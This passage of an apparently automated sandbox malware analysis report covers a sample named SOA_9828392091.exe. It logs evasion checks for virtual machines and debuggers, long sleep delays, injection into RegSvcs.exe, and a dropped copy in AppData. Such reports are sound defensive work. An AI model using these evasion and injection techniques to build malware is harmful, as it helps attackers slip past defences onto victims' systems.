                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SOA_9828392091.exeAPI/Special instruction interceptor: Address: 18BA6BC
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2271Jump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeEvaded block: after key decisiongraph_0-94928
                Source: C:\Users\user\Desktop\SOA_9828392091.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95611
                Source: C:\Users\user\Desktop\SOA_9828392091.exeAPI coverage: 4.4 %
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe TID: 2184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe TID: 4396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00976CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00976CA9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009760DD
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009763F9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0097EB60
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0097F5FA
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097F56F FindFirstFileW,FindClose,0_2_0097F56F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00981B2F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00981C8A
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00981F94
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0094DDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98124Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97029Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96693Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96450Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96340Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94889Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94670Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94553Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SOA_9828392091.exe, 00000000.00000002.2125246358.00000000017DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: RegSvcs.exe, 00000002.00000002.4578860630.0000000005CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SOA_9828392091.exeAPI call chain: ExitProcess graph end nodegraph_0-95258
                Source: C:\Users\user\Desktop\SOA_9828392091.exeAPI call chain: ExitProcess graph end nodegraph_0-94089
                Source: C:\Users\user\Desktop\SOA_9828392091.exeAPI call chain: ExitProcess graph end nodegraph_0-94528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613B410 LdrInitializeThunk,2_2_0613B410
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00986AAF BlockInput,0_2_00986AAF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00933D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00933D19
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00963920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00963920
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00A55F70 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00A55F70
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_018B92F8 mov eax, dword ptr fs:[00000030h]0_2_018B92F8
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_018BA988 mov eax, dword ptr fs:[00000030h]0_2_018BA988
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_018BA928 mov eax, dword ptr fs:[00000030h]0_2_018BA928
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0096A66C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00958189 SetUnhandledExceptionFilter,0_2_00958189
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009581AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SOA_9828392091.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 81D008Jump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096B106 LogonUserW,0_2_0096B106
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00933D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00933D19
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097411C SendInput,keybd_event,0_2_0097411C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009774BB mouse_event,0_2_009774BB
                Source: C:\Users\user\Desktop\SOA_9828392091.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0096A66C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009771FA
                Source: SOA_9828392091.exeBinary or memory string: Shell_TrayWnd
                Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009565C4 cpuid 0_2_009565C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
